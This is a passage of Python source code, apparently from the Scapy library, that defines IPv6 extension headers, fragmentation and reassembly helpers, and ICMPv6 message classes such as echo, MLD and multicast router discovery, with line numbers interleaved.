            chunks.append(_filler(8 - tail))
        return b"".join(chunks)

    def addfield(self, pkt, s, val):
        return s + self.i2m(pkt, val)
930
931
class _PhantomAutoPadField(ByteField):
    """
    Field that exists only as a packet attribute: it adds nothing when
    building and consumes nothing when dissecting (the value is then 1).
    """

    def addfield(self, pkt, s, val):
        # Nothing is written on the wire.
        return s

    def getfield(self, pkt, s):
        # Nothing is read from the wire.
        return s, 1

    def i2repr(self, pkt, x):
        return "On" if x else "Off"
943
944
class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
    """
    Hop-by-Hop Options header.

    'len' counts 8-byte units beyond the first 8 bytes of the header; the
    options start 2 bytes into the header.
    """
    name = "IPv6 Extension Header - Hop-by-Hop Options Header"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        FieldLenField("len", None, length_of="options", fmt="B",
                      adjust=lambda pkt, x: (x + 9) // 8 - 1),
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        _OptionsField("options", [], HBHOptUnknown, 2,
                      length_from=lambda pkt: 8 * pkt.len + 6),
    ]
    overload_fields = {IPv6: {"nh": 0}}
954
955
956# Destination Option Header #
957
class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
    """
    Destination Options header.

    'len' counts 8-byte units beyond the first 8 bytes of the header; the
    options start 2 bytes into the header.
    """
    name = "IPv6 Extension Header - Destination Options Header"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        FieldLenField("len", None, length_of="options", fmt="B",
                      adjust=lambda pkt, x: (x + 9) // 8 - 1),
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        _OptionsField("options", [], HBHOptUnknown, 2,
                      length_from=lambda pkt: 8 * pkt.len + 6),
    ]
    overload_fields = {IPv6: {"nh": 60}}
967
968
969# Routing Header #
970
class IPv6ExtHdrRouting(_IPv6ExtHdr):
    """
    Routing header.

    'len' is twice the number of addresses (8-byte units). When left to
    None, 'segleft' is set at build time to the number of addresses.
    """
    name = "IPv6 Option Header Routing"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # in 8 bytes blocks
        FieldLenField("len", None, count_of="addresses", fmt="B",
                      adjust=lambda pkt, x: 2 * x),
        ByteField("type", 0),
        ByteField("segleft", None),
        # There is meaning in this field ...
        BitField("reserved", 0, 32),
        IP6ListField("addresses", [],
                     length_from=lambda pkt: 8 * pkt.len),
    ]
    overload_fields = {IPv6: {"nh": 43}}

    def post_build(self, pkt, pay):
        if self.segleft is None:
            # 'segleft' is the fourth byte of the header.
            seg_count = struct.pack("B", len(self.addresses))
            pkt = b"".join((pkt[:3], seg_count, pkt[4:]))
        return _IPv6ExtHdr.post_build(self, pkt, pay)
987
988
989# Segment Routing Header #
990
991# This implementation is based on RFC8754, but some older snippets come from:
992# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06
993
# Display names of the Segment Routing Header TLV types.
# RFC 8754 sect 8.2, except the two entries taken from draft 06.
_segment_routing_header_tlvs = dict([
    (0, "Pad1 TLV"),
    (1, "Ingress Node TLV"),  # draft 06
    (2, "Egress Node TLV"),  # draft 06
    (4, "PadN TLV"),
    (5, "HMAC TLV"),
])
1002
1003
class IPv6ExtHdrSegmentRoutingTLV(Packet):
    """
    Generic Segment Routing Header TLV (RFC 8754 sect 2.1).

    Subclasses record themselves in 'registered_sr_tlv' under the default
    value of their 'type' field; dispatch_hook() then selects the class
    matching the first byte of the data being dissected.
    """
    name = "IPv6 Option Header Segment Routing - Generic TLV"
    fields_desc = [
        ByteEnumField("type", None, _segment_routing_header_tlvs),
        ByteField("len", 0),
        StrLenField("value", "", length_from=lambda pkt: pkt.len),
    ]

    # TLV type -> class, shared by the whole hierarchy.
    registered_sr_tlv = {}

    def extract_padding(self, p):
        # What follows the TLV belongs to the next one.
        return b"", p

    @classmethod
    def register_variant(cls):
        cls.registered_sr_tlv[cls.type.default] = cls

    @classmethod
    def dispatch_hook(cls, pkt=None, *args, **kargs):
        if not pkt:
            return cls
        return cls.registered_sr_tlv.get(ord(pkt[:1]), cls)
1026
1027
class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV):
    """Ingress Node TLV (draft-ietf-6man-segment-routing-header-06 3.1.1)."""
    name = "IPv6 Option Header Segment Routing - Ingress Node TLV"
    fields_desc = [
        ByteEnumField("type", 1, _segment_routing_header_tlvs),
        ByteField("len", 18),
        ByteField("reserved", 0),
        ByteField("flags", 0),
        IP6Field("ingress_node", "::1"),
    ]
1036
1037
class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV):
    """Egress Node TLV (draft-ietf-6man-segment-routing-header-06 3.1.2)."""
    name = "IPv6 Option Header Segment Routing - Egress Node TLV"
    fields_desc = [
        ByteEnumField("type", 2, _segment_routing_header_tlvs),
        ByteField("len", 18),
        ByteField("reserved", 0),
        ByteField("flags", 0),
        IP6Field("egress_node", "::1"),
    ]
1046
1047
class IPv6ExtHdrSegmentRoutingTLVPad1(IPv6ExtHdrSegmentRoutingTLV):
    # RFC8754 sect 2.1.1.1
    # NOTE(review): as declared here the TLV carries a len byte and a
    # padding string (default one zero byte), so a default instance is
    # built from three fields. RFC 8754 describes Pad1 as a lone type
    # octet - confirm whether this layout is intentional.
    name = "IPv6 Option Header Segment Routing - Pad1 TLV"
    fields_desc = [
        ByteEnumField("type", 0, _segment_routing_header_tlvs),
        FieldLenField("len", None, length_of="padding", fmt="B"),
        StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len),
    ]
1054
1055
class IPv6ExtHdrSegmentRoutingTLVPadN(IPv6ExtHdrSegmentRoutingTLV):
    # RFC8754 sect 2.1.1.2
    # 'len' is computed from the padding string when left to None.
    name = "IPv6 Option Header Segment Routing - PadN TLV"
    fields_desc = [
        ByteEnumField("type", 4, _segment_routing_header_tlvs),
        FieldLenField("len", None, length_of="padding", fmt="B"),
        StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len),
    ]
1062
1063
class IPv6ExtHdrSegmentRoutingTLVHMAC(IPv6ExtHdrSegmentRoutingTLV):
    name = "IPv6 Option Header Segment Routing - HMAC TLV"
    # RFC8754 sect 2.1.2
    #
    # The Length field is a single octet counting the bytes that follow it:
    # D + reserved (2 bytes), HMAC Key ID (4 bytes) and the HMAC itself.
    # It is therefore 6 + len(hmac), expressed in bytes (the previous
    # offset of 48 was the same quantity counted in bits, and the length
    # field was emitted on two bytes, unlike every other SRH TLV here).
    fields_desc = [ByteEnumField("type", 5, _segment_routing_header_tlvs),
                   FieldLenField("len", None, length_of="hmac", fmt="B",
                                 adjust=lambda _, x: x + 6),
                   BitField("D", 0, 1),
                   BitField("reserved", 0, 15),
                   IntField("hmackeyid", 0),
                   # max() guards against a declared length shorter than
                   # the fixed 6-byte part, which would otherwise produce
                   # a negative slice bound.
                   StrLenField("hmac", "",
                               length_from=lambda pkt: max(pkt.len - 6, 0))]
1075
1076
class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr):
    name = "IPv6 Option Header Segment Routing"
    # RFC8754 sect 2. + flag bits from draft 06
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   ByteField("len", None),
                   ByteField("type", 4),
                   ByteField("segleft", None),
                   ByteField("lastentry", None),
                   BitField("unused1", 0, 1),
                   BitField("protected", 0, 1),
                   BitField("oam", 0, 1),
                   BitField("alert", 0, 1),
                   BitField("hmac", 0, 1),
                   BitField("unused2", 0, 3),
                   ShortField("tag", 0),
                   IP6ListField("addresses", ["::1"],
                                count_from=lambda pkt: (pkt.lastentry + 1)),
                   PacketListField("tlv_objects", [],
                                   IPv6ExtHdrSegmentRoutingTLV,
                                   length_from=lambda pkt: 8 * pkt.len - 16 * (
                                       pkt.lastentry + 1
                                   ))]

    overload_fields = {IPv6: {"nh": 43}}

    def post_build(self, pkt, pay):
        """Fill in 'len', 'segleft' and 'lastentry' when they are None.

        - len: the header is first padded to a multiple of 8 bytes, then
          byte 1 is set to (header length - 8) // 8.
        - segleft: byte 3 is set to len(addresses) - 1 (0 if no address).
        - lastentry: byte 4 is set to len(addresses) - 1; an empty list
          triggers a warning and leaves the value at 0.

        The patched header is then passed to ``_IPv6ExtHdr.post_build``.
        """

        if self.len is None:

            # The extension must be aligned on 8 bytes
            tmp_mod = (-len(pkt) + 8) % 8
            if tmp_mod == 1:
                # A single missing byte is filled with one zero octet,
                # i.e. an RFC 8754 Pad1 TLV. Building an
                # IPv6ExtHdrSegmentRoutingTLVPad1() here would append its
                # type, len and padding bytes (3 bytes) and break the
                # alignment this branch is meant to restore.
                pkt += b"\x00"
            elif tmp_mod >= 2:
                # Add the padding extension: 2 bytes of TLV header plus
                # (tmp_mod - 2) bytes of padding.
                tmp_pad = b"\x00" * (tmp_mod - 2)
                tlv = IPv6ExtHdrSegmentRoutingTLVPadN(padding=tmp_pad)
                pkt += raw(tlv)

            tmp_len = (len(pkt) - 8) // 8
            pkt = pkt[:1] + struct.pack("B", tmp_len) + pkt[2:]

        if self.segleft is None:
            tmp_len = len(self.addresses)
            if tmp_len:
                tmp_len -= 1
            pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:]

        if self.lastentry is None:
            lastentry = len(self.addresses)
            if lastentry == 0:
                warning(
                    "IPv6ExtHdrSegmentRouting(): the addresses list is empty!"
                )
            else:
                lastentry -= 1
            pkt = pkt[:4] + struct.pack("B", lastentry) + pkt[5:]

        return _IPv6ExtHdr.post_build(self, pkt, pay)
1137
1138
1139# Fragmentation Header #
1140
class IPv6ExtHdrFragment(_IPv6ExtHdr):
    name = "IPv6 Extension Header - Fragmentation header"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        BitField("res1", 0, 8),
        BitField("offset", 0, 13),
        BitField("res2", 0, 2),
        BitField("m", 0, 1),
        IntField("id", None),
    ]
    overload_fields = {IPv6: {"nh": 44}}

    def guess_payload_class(self, p):
        """Return Raw for non-first fragments, else defer to the parent.

        A fragment with a non-zero offset is not decoded further; only
        offset 0 goes through the inherited payload guessing.
        """
        if self.offset > 0:
            return Raw
        return super(IPv6ExtHdrFragment, self).guess_payload_class(p)
1156
1157
def defragment6(packets):
    """
    Performs defragmentation of a list of IPv6 packets. Packets are reordered.
    Crap is dropped. What lacks is completed by 'X' characters.

    Only packets containing an IPv6ExtHdrFragment are considered, and among
    those only the ones sharing the fragment id of the first one (a warning
    is emitted if others are discarded).

    :param packets: iterable of packets, in any order
    :return: the reassembled packet, or an empty list when ``packets``
        contains no fragment
    """

    # Remove non fragments
    lst = [x for x in packets if IPv6ExtHdrFragment in x]
    if not lst:
        return []

    frag_id = lst[0][IPv6ExtHdrFragment].id

    llen = len(lst)
    lst = [x for x in lst if x[IPv6ExtHdrFragment].id == frag_id]
    if len(lst) != llen:
        warning("defragment6: some fragmented packets have been removed from list")  # noqa: E501

    # Reorder fragments by increasing offset. sorted() is stable, so
    # fragments carrying the same offset keep their arrival order.
    # (The former hand-written selection loop always picked index 0 and
    # therefore never reordered anything.)
    res = sorted(lst, key=lambda x: x[IPv6ExtHdrFragment].offset)

    # regenerate the fragmentable part
    fragmentable = b""
    frag_hdr_len = 8
    for p in res:
        q = p[IPv6ExtHdrFragment]
        offset = 8 * q.offset  # the offset field counts 8-byte units
        if offset != len(fragmentable):
            warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset))  # noqa: E501
        # When plen is known, use it to cut the fragment data; a None
        # bound below simply keeps the whole payload.
        frag_data_len = p[IPv6].plen
        if frag_data_len is not None:
            frag_data_len -= frag_hdr_len
        # Fill any hole with 'X' (a negative count yields nothing)
        fragmentable += b"X" * (offset - len(fragmentable))
        fragmentable += raw(q.payload)[:frag_data_len]

    # Regenerate the unfragmentable part.
    q = res[0].copy()
    nh = q[IPv6ExtHdrFragment].nh
    q[IPv6ExtHdrFragment].underlayer.nh = nh
    q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable)
    del q[IPv6ExtHdrFragment].underlayer.payload
    q /= conf.raw_layer(load=fragmentable)
    del q.plen

    # Re-dissect from bytes so the reassembled payload gets decoded
    if q[IPv6].underlayer:
        q[IPv6] = IPv6(raw(q[IPv6]))
    else:
        q = IPv6(raw(q))
    return q
1217
1218
def fragment6(pkt, fragSize):
    """
    Performs fragmentation of an IPv6 packet. 'fragSize' argument is the
    expected maximum size of fragment data (MTU). The list of packets is
    returned.

    If packet does not contain an IPv6ExtHdrFragment class, it is added to
    first IPv6 layer found. If no IPv6 layer exists packet is returned in
    result list unmodified.
    """

    pkt = pkt.copy()

    if IPv6ExtHdrFragment not in pkt:
        if IPv6 not in pkt:
            return [pkt]

        # Splice a fragment header between the IPv6 layer and its payload
        ip6 = pkt[IPv6]
        upper = ip6.payload
        new_hdr = IPv6ExtHdrFragment(nh=ip6.nh)

        ip6.remove_payload()
        del ip6.nh
        del ip6.plen

        new_hdr.add_payload(upper)
        ip6.add_payload(new_hdr)

    # If the payload is bigger than 65535, a Jumbo payload must be used, as
    # an IPv6 packet can't be bigger than 65535 bytes.
    if len(raw(pkt[IPv6ExtHdrFragment])) > 65535:
        warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.")  # noqa: E501
        return []

    wire = raw(pkt)  # for instantiation to get upper layer checksum right

    if len(wire) <= fragSize:
        return [pkt]

    # Fragmentable part : fake IPv6 for Fragmentable part length computation
    frag_part = pkt[IPv6ExtHdrFragment].payload
    fake = raw(IPv6(src="::1", dst="::1") / frag_part)
    frag_part_len = len(fake) - 40  # basic IPv6 header length
    pending = wire[-frag_part_len:]

    # Grab Next Header for use in Fragment Header
    next_hdr = pkt[IPv6ExtHdrFragment].nh

    # Keep fragment header
    frag_hdr = pkt[IPv6ExtHdrFragment]
    del frag_hdr.payload  # detach payload

    # Unfragmentable Part
    unfrag_len = len(wire) - frag_part_len - 8
    unfrag = pkt
    del pkt[IPv6ExtHdrFragment].underlayer.payload  # detach payload

    # Cut the fragmentable part to fit fragSize. Inner fragments have
    # a length that is an integer multiple of 8 octets. last Frag MTU
    # can be anything below MTU
    last_size = fragSize - unfrag_len - 8
    inner_size = last_size - (last_size % 8)

    if last_size <= 0 or inner_size == 0:
        warning("Provided fragment size value is too low. " +
                "Should be more than %d" % (unfrag_len + 8))
        return [unfrag / frag_hdr / frag_part]

    fragments = []
    offset_units = 0  # offset, incremented during creation (8-byte units)
    # A random id is always drawn; it is only used when the user did not
    # provide one in the fragment header.
    random_id = random.randint(0, 0xffffffff)
    frag_id = random_id if frag_hdr.id is None else frag_hdr.id
    frag_hdr.m = 1
    frag_hdr.id = frag_id
    frag_hdr.nh = next_hdr

    # Inner fragments: as long as the remainder does not fit in a last
    # fragment, cut inner_size bytes and emit them with M=1.
    while len(pending) > last_size:
        chunk, pending = pending[:inner_size], pending[inner_size:]
        frag_hdr.offset = offset_units  # update offset
        offset_units += inner_size // 8  # compute new one
        if IPv6 in unfrag:
            unfrag[IPv6].plen = None
        fragments.append(unfrag / frag_hdr / conf.raw_layer(load=chunk))

    # Last fragment: whatever is left, with M=0.
    frag_hdr.offset = offset_units
    frag_hdr.m = 0
    if IPv6 in unfrag:
        unfrag[IPv6].plen = None
    fragments.append(unfrag / frag_hdr / conf.raw_layer(load=pending))
    return fragments
1317
1318
1319#############################################################################
1320#############################################################################
1321# ICMPv6* Classes #
1322#############################################################################
1323#############################################################################
1324
1325
# ICMPv6 type -> name of the class implementing it (names are strings
# here; missing types are listed as comments).
icmp6typescls = {
    1: "ICMPv6DestUnreach",
    2: "ICMPv6PacketTooBig",
    3: "ICMPv6TimeExceeded",
    4: "ICMPv6ParamProblem",
    128: "ICMPv6EchoRequest",
    129: "ICMPv6EchoReply",
    130: "ICMPv6MLQuery",  # MLDv1 or MLDv2
    131: "ICMPv6MLReport",
    132: "ICMPv6MLDone",
    133: "ICMPv6ND_RS",
    134: "ICMPv6ND_RA",
    135: "ICMPv6ND_NS",
    136: "ICMPv6ND_NA",
    137: "ICMPv6ND_Redirect",
    # 138: Do Me - RFC 2894 - Seems painful
    139: "ICMPv6NIQuery",
    140: "ICMPv6NIReply",
    141: "ICMPv6ND_INDSol",
    142: "ICMPv6ND_INDAdv",
    143: "ICMPv6MLReport2",
    144: "ICMPv6HAADRequest",
    145: "ICMPv6HAADReply",
    146: "ICMPv6MPSol",
    147: "ICMPv6MPAdv",
    # 148: Do Me - SEND related - RFC 3971
    # 149: Do Me - SEND related - RFC 3971
    151: "ICMPv6MRD_Advertisement",
    152: "ICMPv6MRD_Solicitation",
    153: "ICMPv6MRD_Termination",
    # 154: Do Me - FMIPv6 Messages - RFC 5568
    155: "ICMPv6RPL",  # RFC 6550
}
1358
1359icmp6typesminhdrlen = {1: 8,
1360 2: 8,
1361 3: 8,
1362 4: 8,
1363 128: 8,
1364 129: 8,
1365 130: 24,
1366 131: 24,
1367 132: 24,
1368 133: 8,
1369 134: 16,
1370 135: 24,
1371 136: 24,
1372 137: 40,
1373 # 139:
1374 # 140
1375 141: 8,
1376 142: 8,
1377 143: 8,
1378 144: 8,
1379 145: 8,
1380 146: 8,
1381 147: 8,
1382 151: 8,
1383 152: 4,
1384 153: 4,
1385 155: 4
1386 }
1387
# ICMPv6 type -> human readable name, used by the "type" enum fields.
icmp6types = {
    1: "Destination unreachable",
    2: "Packet too big",
    3: "Time exceeded",
    4: "Parameter problem",
    100: "Private Experimentation",
    101: "Private Experimentation",
    128: "Echo Request",
    129: "Echo Reply",
    130: "MLD Query",
    131: "MLD Report",
    132: "MLD Done",
    133: "Router Solicitation",
    134: "Router Advertisement",
    135: "Neighbor Solicitation",
    136: "Neighbor Advertisement",
    137: "Redirect Message",
    138: "Router Renumbering",
    139: "ICMP Node Information Query",
    140: "ICMP Node Information Response",
    141: "Inverse Neighbor Discovery Solicitation Message",
    142: "Inverse Neighbor Discovery Advertisement Message",
    143: "MLD Report Version 2",
    144: "Home Agent Address Discovery Request Message",
    145: "Home Agent Address Discovery Reply Message",
    146: "Mobile Prefix Solicitation",
    147: "Mobile Prefix Advertisement",
    148: "Certification Path Solicitation",
    149: "Certification Path Advertisement",
    151: "Multicast Router Advertisement",
    152: "Multicast Router Solicitation",
    153: "Multicast Router Termination",
    155: "RPL Control Message",
    200: "Private Experimentation",
    201: "Private Experimentation",
}
1422
1423
class _ICMPv6(Packet):
    name = "ICMPv6 dummy class"
    overload_fields = {IPv6: {"nh": 58}}

    def post_build(self, p, pay):
        """Append the payload and compute the checksum when it is None.

        The checksum is computed with in6_chksum() for next header 58
        over header + payload, and written at bytes 2-3.
        """
        p += pay
        if self.cksum is None:
            chksum = in6_chksum(58, self.underlayer, p)
            p = p[:2] + struct.pack("!H", chksum) + p[4:]
        return p

    def hashret(self):
        """Delegate the hash to the payload."""
        return self.payload.hashret()

    def answers(self, other):
        """Return 1 if type and code match those of ``other``, else 0.

        The comparison only happens when this layer sits on top of an
        IPerror6 or an IPv6 extension header, and ``other`` is itself an
        ICMPv6 message.
        """
        # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
        # The parentheses matter: without them "and" binds tighter than
        # "or", and 'other' was not checked to be ICMPv6 when the
        # underlayer is an IPerror6, so other.type/other.code could be
        # read on an unrelated packet.
        if (isinstance(self.underlayer, (IPerror6, _IPv6ExtHdr)) and
                isinstance(other, _ICMPv6)):
            if not ((self.type == other.type) and
                    (self.code == other.code)):
                return 0
            return 1
        return 0
1448
1449
class _ICMPv6Error(_ICMPv6):
    # Base class of the ICMPv6 error messages: whatever follows the
    # header is always decoded as an IPerror6.
    name = "ICMPv6 errors dummy class"

    def guess_payload_class(self, p):
        """Always decode the payload as IPerror6."""
        return IPerror6
1455
1456
class ICMPv6Unknown(_ICMPv6):
    # Generic layout: type / code / checksum followed by an opaque body.
    name = "Scapy6 ICMPv6 fallback class"
    fields_desc = [
        ByteEnumField("type", 1, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        StrField("msgbody", ""),
    ]
1463
1464
1465# RFC 2460 #
1466
class ICMPv6DestUnreach(_ICMPv6Error):
    name = "ICMPv6 Destination Unreachable"
    fields_desc = [
        ByteEnumField("type", 1, icmp6types),
        ByteEnumField(
            "code", 0,
            {0: "No route to destination",
             1: "Communication with destination administratively prohibited",  # noqa: E501
             2: "Beyond scope of source address",
             3: "Address unreachable",
             4: "Port unreachable"}),
        XShortField("cksum", None),
        ByteField("length", 0),
        X3BytesField("unused", 0),
        _ICMPExtensionPadField(),
        _ICMPExtensionField(),
    ]
    # Post-dissection hook shared with the IPv4 ICMP layer (imported
    # from scapy.layers.inet).
    post_dissection = _ICMP_extpad_post_dissection
1481
1482
class ICMPv6PacketTooBig(_ICMPv6Error):
    # The 'mtu' field defaults to 1280.
    name = "ICMPv6 Packet Too Big"
    fields_desc = [
        ByteEnumField("type", 2, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        IntField("mtu", 1280),
    ]
1489
1490
class ICMPv6TimeExceeded(_ICMPv6Error):
    name = "ICMPv6 Time Exceeded"
    fields_desc = [
        ByteEnumField("type", 3, icmp6types),
        ByteEnumField(
            "code", 0,
            {0: "hop limit exceeded in transit",
             1: "fragment reassembly time exceeded"}),
        XShortField("cksum", None),
        ByteField("length", 0),
        X3BytesField("unused", 0),
        _ICMPExtensionPadField(),
        _ICMPExtensionField(),
    ]
    # Post-dissection hook shared with the IPv4 ICMP layer (imported
    # from scapy.layers.inet).
    post_dissection = _ICMP_extpad_post_dissection
1502
1503
1504# The default pointer value is set to the next header field of
1505# the encapsulated IPv6 packet
1506
1507
class ICMPv6ParamProblem(_ICMPv6Error):
    # 'ptr' defaults to 6, the offset of the next header field in the
    # encapsulated IPv6 packet.
    name = "ICMPv6 Parameter Problem"
    fields_desc = [
        ByteEnumField("type", 4, icmp6types),
        ByteEnumField(
            "code", 0,
            {0: "erroneous header field encountered",
             1: "unrecognized Next Header type encountered",
             2: "unrecognized IPv6 option encountered",
             3: "first fragment has incomplete header chain"}),
        XShortField("cksum", None),
        IntField("ptr", 6),
    ]
1519
1520
class ICMPv6EchoRequest(_ICMPv6):
    name = "ICMPv6 Echo Request"
    fields_desc = [
        ByteEnumField("type", 128, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XShortField("id", 0),
        XShortField("seq", 0),
        StrField("data", ""),
    ]

    def mysummary(self):
        """One-line summary showing the id and seq fields."""
        return self.sprintf("%name% (id: %id% seq: %seq%)")

    def hashret(self):
        """Hash on (id, seq), followed by the payload's own hash."""
        id_seq = struct.pack("HH", self.id, self.seq)
        return id_seq + self.payload.hashret()
1535
1536
class ICMPv6EchoReply(ICMPv6EchoRequest):
    name = "ICMPv6 Echo Reply"
    type = 129

    def answers(self, other):
        """Match an Echo Request carrying the same id, seq and data."""
        if not isinstance(other, ICMPv6EchoRequest):
            return False
        same_ids = self.id == other.id and self.seq == other.seq
        return same_ids and self.data == other.data
1546
1547
1548# ICMPv6 Multicast Listener Discovery (RFC2710) #
1549
# All MLD messages are sent with a link-local source address
# -> make sure of this in post_build if none is specified
# The Hop-Limit value must be 1
1553# "and an IPv6 Router Alert option in a Hop-by-Hop Options
1554# header. (The router alert option is necessary to cause routers to
1555# examine MLD messages sent to multicast addresses in which the router
1556# itself has no interest"
class _ICMPv6ML(_ICMPv6):
    # Field layout shared by the MLD Query / Report / Done classes
    # that derive from this one.
    fields_desc = [
        ByteEnumField("type", 130, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        ShortField("mrd", 0),
        ShortField("reserved", 0),
        IP6Field("mladdr", "::"),
    ]
1564
1565# general queries are sent to the link-scope all-nodes multicast
1566# address ff02::1, with a multicast address field of 0 and a MRD of
1567# [Query Response Interval]
1568# Default value for mladdr is set to 0 for a General Query, and
1569# overloaded by the user for a Multicast Address specific query
1570# TODO : See what we can do to automatically include a Router Alert
1571# Option in a Destination Option Header.
1572
1573
class ICMPv6MLQuery(_ICMPv6ML):  # RFC 2710
    # Defaults describe a General Query: unspecified multicast address,
    # sent to ff02::1 with a hop limit of 1.
    name = "MLD - Multicast Listener Query"
    type = 130
    mrd = 10000  # 10s for mrd
    mladdr = "::"
    overload_fields = {
        IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58},
    }
1580
1581
1582# TODO : See what we can do to automatically include a Router Alert
1583# Option in a Destination Option Header.
class ICMPv6MLReport(_ICMPv6ML):  # RFC 2710
    name = "MLD - Multicast Listener Report"
    type = 131
    overload_fields = {
        IPv6: {"hlim": 1, "nh": 58},
    }

    def answers(self, query):
        """Check the query type"""
        is_mld_query = ICMPv6MLQuery in query
        return is_mld_query
1592
1593# When a node ceases to listen to a multicast address on an interface,
1594# it SHOULD send a single Done message to the link-scope all-routers
1595# multicast address (FF02::2), carrying in its multicast address field
1596# the address to which it is ceasing to listen
1597# TODO : See what we can do to automatically include a Router Alert
1598# Option in a Destination Option Header.
1599
1600
class ICMPv6MLDone(_ICMPv6ML):  # RFC 2710
    # Sent by default to ff02::2 with a hop limit of 1.
    name = "MLD - Multicast Listener Done"
    type = 132
    overload_fields = {
        IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58},
    }
1605
1606
1607# Multicast Listener Discovery Version 2 (MLDv2) (RFC3810) #
1608
class ICMPv6MLQuery2(_ICMPv6):  # RFC 3810
    name = "MLDv2 - Multicast Listener Query"
    fields_desc = [
        ByteEnumField("type", 130, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        ShortField("mrd", 10000),
        ShortField("reserved", 0),
        IP6Field("mladdr", "::"),
        BitField("Resv", 0, 4),
        BitField("S", 0, 1),
        BitField("QRV", 0, 3),
        ByteField("QQIC", 0),
        ShortField("sources_number", None),
        IP6ListField("sources", [],
                     count_from=lambda pkt: pkt.sources_number),
    ]

    # RFC 3810 - Message Formats
    overload_fields = {
        IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58},
    }

    def post_build(self, packet, payload):
        """Compute the 'sources_number' field when needed"""
        if self.sources_number is None:
            # The 16-bit source count sits at bytes 26-27 of the message.
            count = struct.pack("!H", len(self.sources))
            head, tail = packet[:26], packet[28:]
            packet = head + count + tail
        return _ICMPv6.post_build(self, packet, payload)
1634
1635
class ICMPv6MLDMultAddrRec(Packet):
    # 'sources_number' is derived from the byte length of 'sources'
    # divided by 16 (one IPv6 address each).
    name = "ICMPv6 MLDv2 - Multicast Address Record"
    fields_desc = [
        ByteField("rtype", 4),
        FieldLenField("auxdata_len", None, length_of="auxdata", fmt="B"),
        FieldLenField("sources_number", None, length_of="sources",
                      adjust=lambda p, num: num // 16),
        IP6Field("dst", "::"),
        IP6ListField("sources", [],
                     length_from=lambda p: 16 * p.sources_number),
        StrLenField("auxdata", "", length_from=lambda p: p.auxdata_len),
    ]

    def default_payload_class(self, packet):
        """Multicast Address Record followed by another one"""
        return type(self)
1654
1655
class ICMPv6MLReport2(_ICMPv6):  # RFC 3810
    name = "MLDv2 - Multicast Listener Report"
    fields_desc = [
        ByteEnumField("type", 143, icmp6types),
        ByteField("res", 0),
        XShortField("cksum", None),
        ShortField("reserved", 0),
        ShortField("records_number", None),
        PacketListField("records", [], ICMPv6MLDMultAddrRec,
                        count_from=lambda p: p.records_number),
    ]

    # RFC 3810 - Message Formats
    overload_fields = {
        IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58},
    }

    def post_build(self, packet, payload):
        """Compute the 'records_number' field when needed"""
        if self.records_number is None:
            # The 16-bit record count sits at bytes 6-7 of the message.
            count = struct.pack("!H", len(self.records))
            head, tail = packet[:6], packet[8:]
            packet = head + count + tail
        return _ICMPv6.post_build(self, packet, payload)

    def answers(self, query):
        """Check the query type"""
        is_v2_query = isinstance(query, ICMPv6MLQuery2)
        return is_v2_query
1680
1681
1682# ICMPv6 MRD - Multicast Router Discovery (RFC 4286) #
1683
1684# TODO:
1685# - 04/09/06 troglocan : find a way to automatically add a router alert
1686# option for all MRD packets. This could be done in a specific
1687# way when IPv6 is the under layer with some specific keyword
1688# like 'exthdr'. This would allow to keep compatibility with
1689# providing IPv6 fields to be overloaded in fields_desc.
1690#
1691# At the moment, if user inserts an IPv6 Router alert option
1692# none of the IPv6 default values of IPv6 layer will be set.
1693
class ICMPv6MRD_Advertisement(_ICMPv6):
    name = "ICMPv6 Multicast Router Discovery Advertisement"
    fields_desc = [
        ByteEnumField("type", 151, icmp6types),
        ByteField("advinter", 20),
        XShortField("cksum", None),
        ShortField("queryint", 0),
        ShortField("robustness", 0),
    ]
    # IPv6 Router Alert requires manual inclusion
    # NOTE(review): RFC 4286 appears to send Advertisements to the
    # All-Snoopers address (ff02::6a) - confirm the ff02::2 default.
    overload_fields = {
        IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"},
    }

    def extract_padding(self, s):
        """Split the remaining bytes after the first 8: (payload, padding)."""
        payload, padding = s[:8], s[8:]
        return payload, padding
1706
1707
class ICMPv6MRD_Solicitation(_ICMPv6):
    name = "ICMPv6 Multicast Router Discovery Solicitation"
    fields_desc = [
        ByteEnumField("type", 152, icmp6types),
        ByteField("res", 0),
        XShortField("cksum", None),
    ]
    # IPv6 Router Alert requires manual inclusion
    overload_fields = {
        IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"},
    }

    def extract_padding(self, s):
        """Split the remaining bytes after the first 4: (payload, padding)."""
        payload, padding = s[:4], s[4:]
        return payload, padding
1718
1719
class ICMPv6MRD_Termination(_ICMPv6):
    name = "ICMPv6 Multicast Router Discovery Termination"
    fields_desc = [
        ByteEnumField("type", 153, icmp6types),
        ByteField("res", 0),
        XShortField("cksum", None),
    ]
    # IPv6 Router Alert requires manual inclusion
    overload_fields = {
        IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"},
    }

    def extract_padding(self, s):
